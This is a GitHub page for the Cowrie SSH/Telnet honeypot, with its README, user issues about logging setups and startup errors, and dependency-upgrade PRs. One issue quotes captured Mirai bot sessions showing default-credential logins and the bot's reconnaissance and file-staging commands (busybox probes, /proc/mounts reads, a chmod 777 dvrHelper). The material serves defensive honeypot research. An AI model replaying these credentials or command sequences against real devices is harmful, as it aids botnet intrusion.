Cowrie SSH/Telnet Honeypot https://cowrie.readthedocs.io

Overview

Cowrie

travis circleci codecov

Welcome to the Cowrie GitHub repository

This is the official repository for the Cowrie SSH and Telnet Honeypot effort.

What is Cowrie

Cowrie is a medium to high interaction SSH and Telnet honeypot designed to log brute force attacks and the shell interaction performed by the attacker. In medium interaction mode (shell) it emulates a UNIX system in Python, in high interaction mode (proxy) it functions as an SSH and telnet proxy to observe attacker behavior to another system.

Cowrie is maintained by Michel Oosterhof.

Documentation

The Documentation can be found here.

Slack

You can join the Cowrie community at the following Slack workspace.

Features

  • Choose to run as an emulated shell (default):
    • Fake filesystem with the ability to add/remove files. A full fake filesystem resembling a Debian 5.0 installation is included
    • Possibility of adding fake file contents so the attacker can cat files such as /etc/passwd. Only minimal file contents are included
    • Cowrie saves files downloaded with wget/curl or uploaded with SFTP and scp for later inspection
  • Or proxy SSH and telnet to another system
    • Run as a pure telnet and ssh proxy with monitoring
    • Or let Cowrie manage a pool of Qemu emualted servers to provide the systems to login to

For both settings:

  • Session logs are stored in an UML Compatible format for easy replay with the bin/playlog utility.
  • SFTP and SCP support for file upload
  • Support for SSH exec commands
  • Logging of direct-tcp connection attempts (ssh proxying)
  • Forward SMTP connections to SMTP Honeypot (e.g. mailoney)
  • JSON logging for easy processing in log management solutions

Docker

Docker versions are available.

Requirements

Software required:

  • Python 3.6+
  • python-virtualenv

For Python dependencies, see requirements.txt.

Files of interest:

  • etc/cowrie.cfg - Cowrie's configuration file. Default values can be found in etc/cowrie.cfg.dist.
  • share/cowrie/fs.pickle - fake filesystem
  • etc/userdb.txt - credentials to access the honeypot
  • honeyfs/ - file contents for the fake filesystem - feel free to copy a real system here or use bin/fsctl
  • honeyfs/etc/issue.net - pre-login banner
  • honeyfs/etc/motd - post-login banner
  • var/log/cowrie/cowrie.json - transaction output in JSON format
  • var/log/cowrie/cowrie.log - log/debug output
  • var/lib/cowrie/tty/ - session logs, replayable with the bin/playlog utility.
  • var/lib/cowrie/downloads/ - files transferred from the attacker to the honeypot are stored here
  • share/cowrie/txtcmds/ - file contents for simple fake commands
  • bin/createfs - used to create the fake filesystem
  • bin/playlog - utility to replay session logs

Data Sharing

Cowrie will by default upload data on crashes and Python exceptions to api.cowrie.org. This information is used to improve the honeypot and is not shared with third parties. It can be disabled by setting enabled=false in [output_crashreporter].

Contributors

Many people have contributed to Cowrie over the years. Special thanks to:

  • Upi Tamminen (desaster) for all his work developing Kippo on which Cowrie was based
  • Dave Germiquet (davegermiquet) for TFTP support, unit tests, new process handling
  • Olivier Bilodeau (obilodeau) for Telnet support
  • Ivan Korolev (fe7ch) for many improvements over the years.
  • Florian Pelgrim (craneworks) for his work on code cleanup and Docker.
  • Guilherme Borges (sgtpepperpt) for SSH and telnet proxy (GSoC 2019)
  • And many many others.
Comments
  • Setting up ELK to work with Cowrie

    Setting up ELK to work with Cowrie

    Hello folks,

    I'd like to use Kibana to visualize the events in the Cowrie log and have been failing so far. Yes, I have read this article and also issue #402, as well as the documentation.

    To begin with, my setup is fairly simple - just one Cowrie honeypot and ELK installed on the same machine (and supposed to be used on the same machine). So, I don't need Filebeat to ship logs to another machine, correct? Also, I gather from issue #402 that I no longer need an nginx server like the first article mentioned above says, yes?

    So far I've done the following:

    1. Installed elasticsearch, logstash and kibana on the same virtual machine where Cowrie is.
    2. Created /var/log/kibana and modified /etc/kibana/kibana.yml according to the documentation.
    3. Downloaded the GeoIP data and put it in /var/opt/logstash/vendor/geoip/.
    4. Copied cowrie/doc/elk/logstash-cowrie.conf to /etc/logstash/conf.d/ after modifying some paths to make sure they reflect my environment.
    5. Started the service logstash.

    However, the file /tmp/cowrie-logstash.log is not created. What am I missing? Do I need to change some ownerships - e.g., stuff in /etc/logstash/ is currently owned by root.

    Also, does this mean that with this setup Kibana can visualize only one day's worth of data? The file cowrie.json gets renamed after midnight and a new one is created.

    question 
    opened by bontchev 77
  • Not capturing any Mirai samples

    Not capturing any Mirai samples

    I ran a pretty much out-of-the-box Cowrie installation on a virtual machine for a couple of hours. Although the logs show that various Mirai variants have hit 127 times, to my amazement not even a single sample was captured. Going through the logs, I can identify the following cases:

    1. In the vast majority of cases the capturing has failed because of this issue. The discussion of the issue suggests that a hotfix for the problem is available - could we get it merged to master, please?

    2. The second case looks like pretty much a standard Mirai; I do not understand what exactly is failing. It seems to me that the honeypot is providing the right answers. Here is a sample session from the logs:

    2017-01-16T18:32:58+0200 [cowrie.telnet.transport.HoneyPotTelnetFactory] New connection: 109.236.92.144:55305 (192.168.0.104:23) [session: TT10]
    2017-01-16T18:33:01+0200 [CowrieTelnetTransport,10,109.236.92.144] login attempt [root/anko] succeeded
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] Opening TTY Log: log/tty/20170116-183302-None-10i.log
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] CMD: enable
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] Command found: enable 
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] Reading txtcmd from "txtcmds/bin/enable"
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] CMD: shell
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] Command not found: shell
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] CMD: sh
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] Command found: sh 
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] CMD: /bin/busybox ECCHI
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] Command found: /bin/busybox ECCHI
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] CMD: /bin/busybox ps; /bin/busybox ECCHI
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] Command found: /bin/busybox ps
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] Command found: ps
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] Command found: /bin/busybox ECCHI
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] CMD: /bin/busybox cat /proc/mounts; /bin/busybox ECCHI
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] Command found: /bin/busybox cat /proc/mounts
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] Command found: cat /proc/mounts
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] Command found: /bin/busybox ECCHI
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] CMD: /bin/busybox echo -e '\x6b\x61\x6d\x69/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] Command found: /bin/busybox echo -e '\x6b\x61\x6d\x69/dev' > /dev/.nippon
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] Command found: echo -e '\x6b\x61\x6d\x69/dev'
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] Command found: /bin/busybox cat /dev/.nippon
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] Command found: cat /dev/.nippon
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] Command found: /bin/busybox rm /dev/.nippon
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] Command found: rm /dev/.nippon
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] CMD: /bin/busybox ECCHI
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] Command found: /bin/busybox ECCHI
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] CMD: cd /
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] Command found: cd /
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] CMD: /bin/busybox cp /bin/echo dvrHelper; >dvrHelper; /bin/busybox chmod 777 dvrHelper; /bin/busybox ECCHI
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] Command found: /bin/busybox cp /bin/echo dvrHelper
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] Command found: cp /bin/echo dvrHelper
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] Command found: > dvrHelper
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] Command found: /bin/busybox chmod 777 /dvrHelper
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] Command found: chmod 777 /dvrHelper
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] Command found: /bin/busybox ECCHI
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] CMD: /bin/busybox cat /bin/echo
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] Command found: /bin/busybox cat /bin/echo
    2017-01-16T18:33:02+0200 [CowrieTelnetTransport,10,109.236.92.144] Command found: cat /bin/echo
    2017-01-16T18:33:03+0200 [CowrieTelnetTransport,10,109.236.92.144] CMD: /bin/busybox ECCHI
    2017-01-16T18:33:03+0200 [CowrieTelnetTransport,10,109.236.92.144] Command found: /bin/busybox ECCHI
    2017-01-16T18:35:04+0200 [CowrieTelnetTransport,10,109.236.92.144] Closing TTY Log: log/tty/20170116-183302-None-10i.log after 121 seconds
    2017-01-16T18:35:04+0200 [CowrieTelnetTransport,10,109.236.92.144] honeypot terminal protocol connection lost [Failure instance: Traceback (failure with no frames): <class 'twisted.internet.error.ConnectionDone'>: Connection was closed cleanly.
    2017-01-16T18:35:04+0200 [CowrieTelnetTransport,10,109.236.92.144] Connection lost after 126 seconds
    
    1. The third case is completely weird, it seems that the bot is sending commands containing '0x00' characters? Here is a sample session log:
    2017-01-16T18:32:34+0200 [cowrie.telnet.transport.HoneyPotTelnetFactory] New connection: 122.224.33.171:31513 (192.168.0.104:23) [session: TT8]
    2017-01-16T18:32:36+0200 [CowrieTelnetTransport,8,122.224.33.171] login attempt [root/888888] succeeded
    2017-01-16T18:32:36+0200 [CowrieTelnetTransport,8,122.224.33.171] Opening TTY Log: log/tty/20170116-183236-None-8i.log
    2017-01-16T18:32:36+0200 [CowrieTelnetTransport,8,122.224.33.171] Warning: state changed and new state returned
    2017-01-16T18:32:36+0200 [CowrieTelnetTransport,8,122.224.33.171] Received unhandled keyID: '\x00'
    2017-01-16T18:32:37+0200 [CowrieTelnetTransport,8,122.224.33.171] CMD: enable
    2017-01-16T18:32:37+0200 [CowrieTelnetTransport,8,122.224.33.171] Command found: enable 
    2017-01-16T18:32:37+0200 [CowrieTelnetTransport,8,122.224.33.171] Reading txtcmd from "txtcmds/bin/enable"
    2017-01-16T18:32:37+0200 [CowrieTelnetTransport,8,122.224.33.171] Received unhandled keyID: '\x00'
    2017-01-16T18:32:37+0200 [CowrieTelnetTransport,8,122.224.33.171] CMD: system
    2017-01-16T18:32:37+0200 [CowrieTelnetTransport,8,122.224.33.171] Command not found: system
    2017-01-16T18:32:37+0200 [CowrieTelnetTransport,8,122.224.33.171] Received unhandled keyID: '\x00'
    2017-01-16T18:32:37+0200 [CowrieTelnetTransport,8,122.224.33.171] CMD: shell
    2017-01-16T18:32:37+0200 [CowrieTelnetTransport,8,122.224.33.171] Command not found: shell
    2017-01-16T18:32:37+0200 [CowrieTelnetTransport,8,122.224.33.171] Received unhandled keyID: '\x00'
    2017-01-16T18:32:38+0200 [CowrieTelnetTransport,8,122.224.33.171] CMD: sh
    2017-01-16T18:32:38+0200 [CowrieTelnetTransport,8,122.224.33.171] Command found: sh 
    2017-01-16T18:32:38+0200 [CowrieTelnetTransport,8,122.224.33.171] Received unhandled keyID: '\x00'
    2017-01-16T18:32:38+0200 [CowrieTelnetTransport,8,122.224.33.171] CMD: /bin/busybox MIRAI
    2017-01-16T18:32:38+0200 [CowrieTelnetTransport,8,122.224.33.171] Command found: /bin/busybox MIRAI
    2017-01-16T18:32:39+0200 [CowrieTelnetTransport,8,122.224.33.171] Closing TTY Log: log/tty/20170116-183236-None-8i.log after 2 seconds
    2017-01-16T18:32:39+0200 [CowrieTelnetTransport,8,122.224.33.171] honeypot terminal protocol connection lost [Failure instance: Traceback (failure with no frames): <class 'twisted.internet.error.ConnectionDone'>: Connection was closed cleanly.
    2017-01-16T18:32:39+0200 [CowrieTelnetTransport,8,122.224.33.171] Connection lost after 4 seconds
    
    opened by bontchev 30
  • Logging in a MySQL database

    Logging in a MySQL database

    Hello folks,

    Elasticsearch crapped very badly on me and I had to rebuild the whole database from scratch, so I don't trust it any more. Unfortunately, Kibana depends on it, which means that if I scrap it, I won't be able to use Kibana for visualizations. However, a colleague told me that he could very easily make the visualizations I currently use if the data is in a MySQL database. So, I am not trying to make Cowrie save its data in such a database. Unfortunately, I am also failing miserably, so I could use your help.

    To begin with, I followed this guide. It's from a couple of years ago, but it seems mostly actual, because everything worked - the database was created with the corresponding tables and structure. I have modified the [output_mysql] section in cowrie.cfg accordingly, to specify the host containing the database, user name, password, etc. I used a stand-alone Python script to check that I can indeed connect to the database from the machine on which Cowrie is running and do some trivial stuff, like getting the MySQL version.

    Unfortunately, when I start Cowrie, I get the error message

    'Failed to load output engine: mysql due to ImportError: No module named MySQLdb'

    Now, the module mysql-python is installed - I installed it while following the guide mentioned above. But it wasn't installed (yet) when I installed Cowrie, months ago. I guess that means it isn't installed in the virtual environment cowrie-env? How do I install it there? (I was hoping that the virtual environment would see modules that are globally installed on the system, but I guess it doesn't.) I hope I don't need to scrap the whole Cowrie installation and re-install it from scratch?

    opened by bontchev 27
  • i have gone throuth all steps for cowrie honeypot but got this error after ./start.sh

    i have gone throuth all steps for cowrie honeypot but got this error after ./start.sh

    this errors displayed Starting cowrie with extra arguments [] ... Unhandled Error Traceback (most recent call last): File "/usr/lib/python2.7/dist-packages/twisted/application/app.py", line 579, in parseOptions usage.Options.parseOptions(self, options) File "/usr/lib/python2.7/dist-packages/twisted/python/usage.py", line 262, in parseOptions for (cmd, short, parser, doc) in self.subCommands: File "/usr/lib/python2.7/dist-packages/twisted/application/app.py", line 596, in subCommands for plug in sorted(plugins, key=attrgetter('tapname')): File "/usr/lib/python2.7/dist-packages/twisted/plugin.py", line 213, in getPlugins allDropins = getCache(package) --- --- File "/usr/lib/python2.7/dist-packages/twisted/plugin.py", line 171, in getCache provider = pluginModule.load() File "/usr/lib/python2.7/dist-packages/twisted/python/modules.py", line 389, in load return self.pathEntry.pythonPath.moduleLoader(self.name) File "/usr/lib/python2.7/dist-packages/twisted/python/reflect.py", line 303, in namedAny topLevelPackage = _importAndCheckStack(trialname) File "/usr/lib/python2.7/dist-packages/twisted/python/reflect.py", line 250, in _importAndCheckStack reraise(excValue, excTraceback) File "/home/cowrie/cowrie/twisted/plugins/cowrie_plugin.py", line 46, in from cowrie.core.config import readConfigFile File "/home/cowrie/cowrie/cowrie/core/config.py", line 8, in import configparser exceptions.ImportError: No module named configparser

    Unhandled Error Traceback (most recent call last): File "/usr/lib/python2.7/dist-packages/twisted/python/usage.py", line 447, in str return self.getSynopsis() + '\n' + self.getUsage(width=None) File "/usr/lib/python2.7/dist-packages/twisted/python/usage.py", line 483, in getUsage for (cmd, short, parser, desc) in self.subCommands: File "/usr/lib/python2.7/dist-packages/twisted/application/app.py", line 596, in subCommands for plug in sorted(plugins, key=attrgetter('tapname')): File "/usr/lib/python2.7/dist-packages/twisted/plugin.py", line 213, in getPlugins allDropins = getCache(package) --- --- File "/usr/lib/python2.7/dist-packages/twisted/plugin.py", line 171, in getCache provider = pluginModule.load() File "/usr/lib/python2.7/dist-packages/twisted/python/modules.py", line 389, in load return self.pathEntry.pythonPath.moduleLoader(self.name) File "/usr/lib/python2.7/dist-packages/twisted/python/reflect.py", line 303, in namedAny topLevelPackage = _importAndCheckStack(trialname) File "/usr/lib/python2.7/dist-packages/twisted/python/reflect.py", line 250, in _importAndCheckStack reraise(excValue, excTraceback) File "/home/cowrie/cowrie/twisted/plugins/cowrie_plugin.py", line 46, in from cowrie.core.config import readConfigFile File "/home/cowrie/cowrie/cowrie/core/config.py", line 8, in import configparser exceptions.ImportError: No module named configparser

    Usage: twistd [options] Options: --savestats save the Stats object rather than the text output of the profiler. -o, --no_save do not save state on shutdown -e, --encrypted The specified tap/aos file is encrypted. -n, --nodaemon don't daemonize, don't use default umask of 0077 --originalname Don't try to change the process name --syslog Log to syslog, not to file --euid Set only effective user-id rather than real user-id. (This option has no effect unless the server is running as root, in which case it means not to shed all privileges after binding ports, retaining the option to regain privileges in cases such as spawning processes. Use with caution.) -l, --logfile= log to a specified file, - for stdout --logger= A fully-qualified name to a log observer factory to use for the initial log observer. Takes precedence over --logfile and --syslog (when available). -p, --profile= Run in profile mode, dumping results to specified file. --profiler= Name of the profiler to use (profile, cprofile). [default: cprofile] -f, --file= read the given .tap file [default: twistd.tap] -y, --python= read an application from within a Python file (implies -o) -s, --source= Read an application from a .tas file (AOT format). -d, --rundir= Change to a supplied directory before running [default: .] --prefix= use the given prefix when syslogging [default: twisted] --pidfile= Name of the pidfile [default: twistd.pid] --chroot= Chroot to a supplied directory before running -u, --uid= The uid to run as. -g, --gid= The gid to run as. --umask= The (octal) file creation mask to apply. --help-reactors Display a list of possibly available reactor names. --version Print version information and exit. --spew Print an insanely verbose log of everything that happens. Useful when debugging freezes or locks in complex code. -b, --debug Run the application in the Python Debugger (implies nodaemon), sending SIGUSR2 will drop into debugger -r, --reactor= Which reactor to use (see --help-reactors for a list of possibilities) --help Display this help and exit.

    twistd reads a twisted.application.service.Application out of a file and runs it. Commands: conch A Conch SSH service. dns A domain name server. ftp An FTP server. inetd An inetd(8) replacement. mail An email service manhole An interactive remote debugger service accessible via telnet and ssh and providing syntax coloring and basic line editing functionality. manhole-old An interactive remote debugger service. news A news server. portforward A simple port-forwarder. procmon A process watchdog / supervisor socks A SOCKSv4 proxy service. telnet A simple, telnet-based remote debugging service. web A general-purpose web server which can serve from a filesystem or application resource. words A modern words server xmpp-router An XMPP Router server

    question 
    opened by rereee 26
  • output_mysql not sending data

    output_mysql not sending data

    In the database, only table sessions' has many data, the other tables such asauth,clients,input,ttyloghave no data. Andlog/cowrie.logandlog/cowrie.jsonhave become binary files... What's the matter?... Here are the screenshots: ![zj1 qzbl r0g 4lj a qb](https://cloud.githubusercontent.com/assets/17915615/19677173/9e3e8ea6-9aca-11e6-9c18-53d88e7605e2.png) ![ut1 5_7k 7qrggv4b7pdith](https://cloud.githubusercontent.com/assets/17915615/19677209/c6d128e2-9aca-11e6-9e2e-e5f2b20fadf8.png) ![9tl8 i r pn80bh 1j olr](https://cloud.githubusercontent.com/assets/17915615/19677228/dbc4b962-9aca-11e6-8fec-573ca4a6df38.png) ![ceppb dwca w r4 if 4 d](https://cloud.githubusercontent.com/assets/17915615/19677240/eec24a34-9aca-11e6-9c1f-5eba6fedd259.png) ![cllo45bi hr n14ysdsw_vi](https://cloud.githubusercontent.com/assets/17915615/19677266/0d140bda-9acb-11e6-8503-ebc1fc94d3a2.png) ![gsz g 6 04mj5vp0u n](https://cloud.githubusercontent.com/assets/17915615/19677314/4be3439e-9acb-11e6-8c03-d4bd6132f799.png) In tablesensors`, the ip is my server ip...

    bug 
    opened by NitroCao 26
  • Cowrie writes to MySQL in local time zone

    Cowrie writes to MySQL in local time zone

    I know that when Cowrie produces a JSON log, the timestamps there are in UTC. But how are they stored in a MySQL database?

    I'm asking because I hit some rather bizarre problem. I'm trying to make a simple graph of the number of login attempts for every hour using Grafana as the visualizer. The graph looks fine but the time (the X-axis) is shifted by 3 hours.

    My local time zone is UTC+3 right now (GMT+2 geographically, plus 1 hour daylight savings). Grafana is configured to display times in the local time zone of the viewer. One explanation for the mismatch could be that the data itself is wrong - i.e., is stored in local time in the database, instead of in UTC.

    The problem is, I can't figure out exactly what is happening. Cowrie writes the data to the database using the STR_TO_DATE() MySQL function, which takes two arguments - the date itself (presumably in UTC, because it's the same thing that's written to the JSON log?) and a format string, which is set to '%Y-%m-%dT%H:%i:%s.%fZ'. Doesn't this mean that the timestamp ought to go as an UTC timestamp in the database? Besides, I've read somewhere that timestamp data is stored always as UTC timestamps by MySQL. Assuming that the time zone of my MySQL server is set to UTC+3, wouldn't that mean that an unnecessary conversion is made and 3 hours are subtracted from the timestamp?

    Maybe Cowrie should set the time zone of its MySQL connection to UTC+0? Like

    SET time_zone='+00:00';

    bug 
    opened by bontchev 22
  • Problem in ./start.sh exceptions.AttributeError: 'module' object has no attribute 'IPluggableAuthenticationModules'

    Problem in ./start.sh exceptions.AttributeError: 'module' object has no attribute 'IPluggableAuthenticationModules'

    I have an error in start.sh (I'm on Ubuntu 14.04) :

    (envirt)[email protected]:~/kippo/kippo-master$ ./start.sh twistd (the Twisted daemon) 16.0.0 Copyright (c) 2001-2016 Twisted Matrix Laboratories. See LICENSE for details. Starting kippo in the background... Unhandled Error Traceback (most recent call last): File "/home/michel/envirt/local/lib/python2.7/site-packages/Twisted-16.0.0-py2.7-linux-i686.egg/twisted/application/app.py", line 617, in run runApp(config) File "/home/michel/envirt/local/lib/python2.7/site-packages/Twisted-16.0.0-py2.7-linux-i686.egg/twisted/scripts/twistd.py", line 25, in runApp _SomeApplicationRunner(config).run() File "/home/michel/envirt/local/lib/python2.7/site-packages/Twisted-16.0.0-py2.7-linux-i686.egg/twisted/application/app.py", line 348, in run self.application = self.createOrGetApplication() File "/home/michel/envirt/local/lib/python2.7/site-packages/Twisted-16.0.0-py2.7-linux-i686.egg/twisted/application/app.py", line 413, in createOrGetApplication application = getApplication(self.config, passphrase) --- --- File "/home/michel/envirt/local/lib/python2.7/site-packages/Twisted-16.0.0-py2.7-linux-i686.egg/twisted/application/app.py", line 424, in getApplication application = service.loadApplication(filename, style, passphrase) File "/home/michel/envirt/local/lib/python2.7/site-packages/Twisted-16.0.0-py2.7-linux-i686.egg/twisted/application/service.py", line 411, in loadApplication passphrase) File "/home/michel/envirt/local/lib/python2.7/site-packages/Twisted-16.0.0-py2.7-linux-i686.egg/twisted/persisted/sob.py", line 224, in loadValueFromFile eval(codeObj, d, d) File "kippo.tac", line 26, in import kippo.core.auth File "/home/michel/kippo/kippo-master/kippo/core/auth.py", line 102, in class HoneypotPasswordChecker: File "/home/michel/kippo/kippo-master/kippo/core/auth.py", line 105, in HoneypotPasswordChecker credentialInterfaces = (credentials.IUsernamePassword, credentials.IPluggableAuthenticationModules) exceptions.AttributeError: 'module' object has no attribute 'IPluggableAuthenticationModules'

    Failed to load application: 'module' object has no attribute 'IPluggableAuthenticationModules'

    Please help me. Thanks

    question 
    opened by miha237 22
  • userdb not checked

    userdb not checked

    I have copied the userdb.example to userdb.txt in the etc folder, by running this command: [email protected] cp userdb.example eserdb.txt. I then stopped cowrie and started it again.

    However, I still can access the honeypot with username root, and password root, even though in the userdb, it says root:x:!root

    question 
    opened by RunnyRun 21
  • How do you customize the honeypot filesystem?

    How do you customize the honeypot filesystem?

    From the documentation, it seems that all I'd need to do to replace Cowrie's default filesystem is to do:

    • Copy a new file system to honeyfs
    • Run ./bin/createfs -l honeyfs -o data/fs.pickle

    When I tried to do this from a OpenWRT filesystem, the commands executed successfully but commands in the honeypot (e.g. ls, cp, rm don't work). /bin/busybox works, but running /bin/busybox ls errors out with applet not found.

    I'm using Python 3.5 on Ubuntu 16.04.

    question 
    opened by supriyo-biswas 21
  • Can't stop Cowrie

    Can't stop Cowrie

    Been playing around with Cowrie and am loving it. But it won't stop for me unless I kill the process. I'm starting it by ~/cowrie/bin/./cowrie start. Doing a ~/cowrie/bin/./cowrie stop doesn't stop it though. There is no error message at console from the stop command and it just returns me to a prompt after I push enter.

    I have to lookup the process with "ps aux" and kill it by the PID. Is this normal? Running Ubuntu Server 16.

    opened by biggen1684 20
  • commands not executing when directory path contains symbolic links

    commands not executing when directory path contains symbolic links

    Hi Michel,

    I can't explain why but my Cowrie doesn't accept the usual commands like "ls", "cat", "ping" bash: cat: command not found bash: ls: command not found

    wget, curl, help, the (customized) txtcmds works fine.

    I'm running Centos 7, I have customized the honeyfs files, txtcmds and generated a filesystem with createfs.py (cleaned with fsctl.py)

    Any hints ?

    Regards.

    bug 
    opened by AbyssAndreal 20
  • [Snyk] Security upgrade setuptools from 39.0.1 to 65.5.1

    [Snyk] Security upgrade setuptools from 39.0.1 to 65.5.1

    This PR was automatically created by Snyk using the credentials of a real user.


    Snyk has created this PR to fix one or more vulnerable packages in the `pip` dependencies of this project.

    Changes included in this PR

    • Changes to the following files to upgrade the vulnerable dependencies to a fixed version:
      • requirements-output.txt
    ⚠️ Warning
    slackclient 2.9.4 requires aiohttp, which is not installed.
    service-identity 21.1.0 requires cryptography, which is not installed.
    pyOpenSSL 22.1.0 requires cryptography, which is not installed.
    geoip2 4.6.0 requires aiohttp, which is not installed.
    
    

    Vulnerabilities that will be fixed

    By pinning:

    Severity | Priority Score (*) | Issue | Upgrade | Breaking Change | Exploit Maturity :-------------------------:|-------------------------|:-------------------------|:-------------------------|:-------------------------|:------------------------- medium severity | 551/1000
    Why? Recently disclosed, Has a fix available, CVSS 5.3 | Regular Expression Denial of Service (ReDoS)
    SNYK-PYTHON-SETUPTOOLS-3180412 | setuptools:
    39.0.1 -> 65.5.1
    | No | No Known Exploit

    (*) Note that the real score may have changed since the PR was raised.

    Some vulnerabilities couldn't be fully fixed and so Snyk will still find them when the project is tested again. This may be because the vulnerability existed within more than one direct dependency, but not all of the affected dependencies could be upgraded.

    Check the changes in this PR to ensure they won't cause issues with your project.


    Note: You are seeing this because you or someone else with access to this repository has authorized Snyk to open fix PRs.

    For more information: 🧐 View latest project report

    🛠 Adjust project settings

    📚 Read more about Snyk's upgrade and patch logic


    Learn how to fix vulnerabilities with free interactive lessons:

    🦉 Regular Expression Denial of Service (ReDoS)

    opened by micheloosterhof 1
  • [Snyk] Security upgrade setuptools from 39.0.1 to 65.5.1

    [Snyk] Security upgrade setuptools from 39.0.1 to 65.5.1

    This PR was automatically created by Snyk using the credentials of a real user.


    Snyk has created this PR to fix one or more vulnerable packages in the `pip` dependencies of this project.

    Changes included in this PR

    • Changes to the following files to upgrade the vulnerable dependencies to a fixed version:
      • requirements.txt
    ⚠️ Warning
    service-identity 21.1.0 requires cryptography, which is not installed.
    pyOpenSSL 22.1.0 requires cryptography, which is not installed.
    
    

    Vulnerabilities that will be fixed

    By pinning:

    Severity | Priority Score (*) | Issue | Upgrade | Breaking Change | Exploit Maturity :-------------------------:|-------------------------|:-------------------------|:-------------------------|:-------------------------|:------------------------- medium severity | 551/1000
    Why? Recently disclosed, Has a fix available, CVSS 5.3 | Regular Expression Denial of Service (ReDoS)
    SNYK-PYTHON-SETUPTOOLS-3180412 | setuptools:
    39.0.1 -> 65.5.1
    | No | No Known Exploit

    (*) Note that the real score may have changed since the PR was raised.

    Some vulnerabilities couldn't be fully fixed and so Snyk will still find them when the project is tested again. This may be because the vulnerability existed within more than one direct dependency, but not all of the affected dependencies could be upgraded.

    Check the changes in this PR to ensure they won't cause issues with your project.


    Note: You are seeing this because you or someone else with access to this repository has authorized Snyk to open fix PRs.

    For more information: 🧐 View latest project report

    🛠 Adjust project settings

    📚 Read more about Snyk's upgrade and patch logic


    Learn how to fix vulnerabilities with free interactive lessons:

    🦉 Regular Expression Denial of Service (ReDoS)

    opened by micheloosterhof 1
  • output_mysql: No result set to fetch from.

    output_mysql: No result set to fetch from.

    Hello,

    i have new cowrie installation under python 3.9.13 virtualenv List of packages:

    Package            Version
    ------------------ ---------
    appdirs            1.4.4
    attrs              22.1.0
    Automat            22.10.0
    bcrypt             4.0.1
    certifi            2022.9.24
    cffi               1.15.1
    charset-normalizer 2.1.1
    configparser       5.2.0
    constantly         15.1.0
    cryptography       38.0.4
    hyperlink          21.0.0
    idna               3.4
    incremental        22.10.0
    mysql-connector    2.2.9
    packaging          21.3
    pip                22.3.1
    pyasn1             0.4.8
    pyasn1-modules     0.2.8
    pycparser          2.21
    pyOpenSSL          22.1.0
    pyparsing          3.0.9
    python-dateutil    2.8.2
    requests           2.28.1
    service-identity   21.1.0
    setuptools         65.6.3
    six                1.16.0
    tftpy              0.8.2
    treq               22.2.0
    Twisted            22.4.0
    typing_extensions  4.4.0
    urllib3            1.26.13
    wheel              0.38.4
    zope.interface     5.5.2
    

    i am getting below error in cowrie.log

    2022-12-06T07:29:34.709158Z [HoneyPotSSHTransport,3,xx.xx.xx.xx] Rollback failed
            Traceback (most recent call last):
              File "/home/cowrie/cowrie-env/lib/python3.9/site-packages/twisted/python/threadpool.py", line 260, in <lambda>
                inContext.theWork = lambda: context.call(  # type: ignore[attr-defined]
              File "/home/cowrie/cowrie-env/lib/python3.9/site-packages/twisted/python/context.py", line 117, in callWithContext
                return self.currentContext().callWithContext(ctx, func, *args, **kw)
              File "/home/cowrie/cowrie-env/lib/python3.9/site-packages/twisted/python/context.py", line 82, in callWithContext
                return func(*args, **kw)
              File "/home/cowrie/COWRIE/src/cowrie/output/mysql.py", line 38, in _runInteraction
                return adbapi.ConnectionPool._runInteraction(self, interaction, *args, **kw)
            --- <exception caught here> ---
              File "/home/cowrie/cowrie-env/lib/python3.9/site-packages/twisted/enterprise/adbapi.py", line 449, in _runInteraction
                conn.rollback()
              File "/home/cowrie/cowrie-env/lib/python3.9/site-packages/twisted/enterprise/adbapi.py", line 66, in rollback
                raise ConnectionLost()
            twisted.enterprise.adbapi.ConnectionLost: 
